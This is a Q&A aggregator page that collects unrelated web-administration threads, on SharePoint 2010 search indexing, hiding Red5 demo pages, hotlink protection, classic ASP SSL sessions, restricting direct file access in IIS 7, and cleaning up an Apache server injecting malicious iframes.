Sharepoint 2010 not searching content across files - sharepoint-2010

Having made sure that all the proper indexing options are set, my dev install of SP2010 is still not searching the content of word docs, only titles. Any suggestions?

Does your crawler account has sufficient permission to access the file attached to the list item ? Are you crawling your site as a SharePoint site or as a web site (in that case you need to make sure that you have link(s) pointing to the document(s).
Don't you have robots.txt file a the root of your web application that might have exclusions rules preventing the content to be properly crawled ?
If you really want to know what's happening when the crawler is doing it's job, you can install fiddler on your dev machine and change the proxy settings of your search service application to the one created by fiddler. Doing so will allow you to check in real time what url / content is currently being crawled and the http status code that are being returned to diagnose permissions / content issue.
Hope it helped.

Related

How to bypass red5 demo page on start up?

At present, I start up red5 in linux command line ./red5.sh and it runs the script. Then I go to http://localhost:5080 demos page to set up my camera and audio input and all works fine in testing the stream both on demo page and in swf of my webpage.
Question is, do I need to include some java and/or action script for the swf player to
bypass the red5 demo page so I can directly connect my input and stream in the code of the page? Also so only logged in webpage viewers can connect?
Overall wondering if there is a way of hiding the server stream from anyone not logged in to view it on my site? I understand in webapps folder somewhere there is the hosts list of IP but it would be impossible to know the IP of the viewers as opposed to unwanted viewers or bandwidth stealers.
I am trying to set up a site for poetry readings and make it so readers can record live to my server and then logged in viewers can view from my website. I am trying to figure out whether I must have that red5 page open and if that doesn't pose some kind of risk.
Found my own way of doing this just by removing and renaming files and folders.
If you go to usr/local/red5/webapps here lies all the directories for viewing when you go to default port 5080 so I simply installed the applications I needed and then took everything out of there except those applications I wanted and needed to run. I took out all and placed it in a folder in /var directory named it red5_movedstuff in case I want access to further applications later on.Then I renamed the applications I am using in webapps folder and kept admin folder to access them but I renamed my applications and had to importantly rename also in WEB-INF for each application name change.
Now if someone goes to myip:5080 they get a blank page and by changing names of applications I've hidden my directories beyond that including list of streams.

How to prevent bandwidth theft of my website and why I find my website IP address sometimes dedicated & sometimes shared

I think someone is stealing bandwidth of my website. To prevent this I enabled hotlink. But there are only extensions related to image. How can I protect my other files with extensions like .php or .asp? When I add .php or .asp extensions, I was unable to access in my website.
Another thing is, I found, in my cpanel IP address of my website sometimes appears as dedicated and sometimes as shared. Why is this happening?
I found static.reverse.softlayer.com in my visitors list. But which web pages it visited are not displayed. Please help me.
You can only protect secondary material from hotlinking, for example images, Javascript files and CSS files. Because those are fetched from a page in your site, the server can determine if they are used correctly or not.
If you try to keep primary material (e.g. the actual web pages) from being hotlinked, you are actually keeping them from being fetched at all. Any resource that you want to be available directly can't be locked down that way.

Classic ASP and SSL in a folder

We have a folder in a classic asp site that has ssl set up for that folder. It works but when you load the first page within the folder and then follow a hyperlink to another page in the folder you get kicked back to the page outside the folder which led into the https stuff.
Repeat the process (follow link on non https page > go to https folder > follow link to other page in https folder) and it all works fine, for a random number of hops between pages in the https folder, then bang, kicked out again.
I have noticed that the session ID changes all the time when hopping between pages in the https folder. Someone said it was due to IE compatabilty mode swapping but I have forced the thing with a header and using IE dev tools (miss you Firebug) I see the mode stays constant. any ideas please?
We had a similar issue with another project last year. #padas is correct. Sessions on http and https are different and the server will have a problem with it. The option we went for was to https the whole site. It makes sense anyway and helps the user gain confidence in what they are browsing.
It sounds like your traversing between http and https and that will change the session id. If your pages are using session id's to track people you will have issues. You are better off dropping a cookie or forcing https.

Preventing direct access to files in IIS 7

I have a PHP application running on a Micrisoft IIS 7 server. The application shows PDF files on an iFrame, which contains user's sensitive data that I wouldn't like to be directly accessed by anyone that knows the file address.
So basically, I'm looking for a way to protect files from direct browser access or download, but still be able to show it on the application's iFrame.
I made some research with Rewrite rules, but since the "HTTP_REFERER" of an iFrame is empty, I couldn't find a good solution
Any suggestions for this?
Thanks in advance
Without seeing any of your code, or how your application works, I can only give suggestions based on how I think your app works.
Rather than showing the files themselves, with links directly to those files, you should consider changing your application so that the PHP reads in the directory, displays the file names (however you want them to appear), with links that go to a download.php page. The download page (after checking whether the user has permission to download the file) then loads the file into memory and serves it out as a response (with appropriate Content-Disposition and Content-Type headers).
Since your PHP application can read files directly within the web directory, you can set up rewrite rules to prevent accessing those files from the web; that way, the files can only be accessed by the PHP application, which doesn't rely on rewrite rules to access the drive.
This is how places like Source Forge can display an advertisement with a countdown that your file download will begin in 5 seconds.

Apache attack on compromised server, iframe injected by string replace

My server has been compromised recently. This morning, I have discovered that the intruder is injecting an iframe into each of my HTML pages. After testing, I have found out that the way he does that is by getting Apache (?) to replace every instance of
<body>
by
<iframe link to malware></iframe></body>
For example if I browse a file residing on the server consisting of:
</body>
</body>
Then my browser sees a file consisting of:
<iframe link to malware></iframe></body>
<iframe link to malware></iframe></body>
I have immediately stopped Apache to protect my visitors, but so far I have not been able to find what the intruder has changed on the server to perform the attack. I presume he has modified an Apache config file, but I have no idea which one. In particular, I have looked for recently modified files by time-stamp, but did not find anything noteworthy.
Thanks for any help.
Tuan.
PS: I am in the process of rebuilding a new server from scratch, but in the while, I would like to keep the old one running, since this is a business site.
I don't know the details of your compromised server. While this is a fairly standard drive-by attack against Apache that you can, ideally, resolve by rolling back to a previous version of your web content and server configuration (if you have a colo, contact the technical team responsible for your backups), let's presume you're entirely on your own and need to fix the problem yourself.
Pulling from StopBadware.org's documentation on the most common drive-by scenarios and resolution cases:
Malicious scripts
Malicious scripts are often used to redirect site visitors to a
different website and/or load badware from another source. These
scripts will often be injected by an attacker into the content of your
web pages, or sometimes into other files on your server, such as
images and PDFs. Sometimes, instead of injecting the entire script
into your web pages, the attacker will only inject a pointer to a .js
or other file that the attacker saves in a directory on your web
server.
Many malicious scripts use obfuscation to make them more difficult for
anti-virus scanners to detect:
Some malicious scripts use names that look like they’re coming from
legitimate sites (note the misspelling of “analytics”):
.htaccess redirects
The Apache web server, which is used by many hosting providers, uses a
hidden server file called .htaccess to configure certain access
settings for directories on the website. Attackers will sometimes
modify an existing .htaccess file on your web server or upload new
.htaccess files to your web server containing instructions to redirect
users to other websites, often ones that lead to badware downloads or
fraudulent product sales.
Hidden iframes
An iframe is a section of a web page that loads content from another
page or site. Attackers will often inject malicious iframes into a web
page or other file on your server. Often, these iframes will be
configured so they don’t show up on the web page when someone visits
the page, but the malicious content they are loading will still load,
hidden from the visitor’s view.
How to look for it
If your site was reported as a badware site by Google, you can use
Google’s Webmaster Tools to get more information about what was
detected. This includes a sampling of pages on which the badware was
detected and, using a Labs feature, possibly even a sample of the bad
code that was found on your site. Certain information can also be
found on the Google Diagnostics page, which can be found by replacing
example.com in the following URL with your own site’s URL:
www.google.com/safebrowsing/diagnostic?site=example.com
There exist several free and paid website scanning services on the
Internet that can help you zero in on specific badware on your site.
There are also tools that you can use on your web server and/or on a
downloaded copy of the files from your website to search for specific
text. StopBadware does not list or recommend such services, but the
volunteers in our online community will be glad to point you to their
favorites.
In short, use the stock-standard tools and scanners provided by Google first. If the threat can't otherwise be identified, you'll need to backpath through the code of your CMS, Apache configuration, SQL setup, and remaining content of your website to determine where you were compromised and what the right remediation steps should be.
Best of luck handling your issue!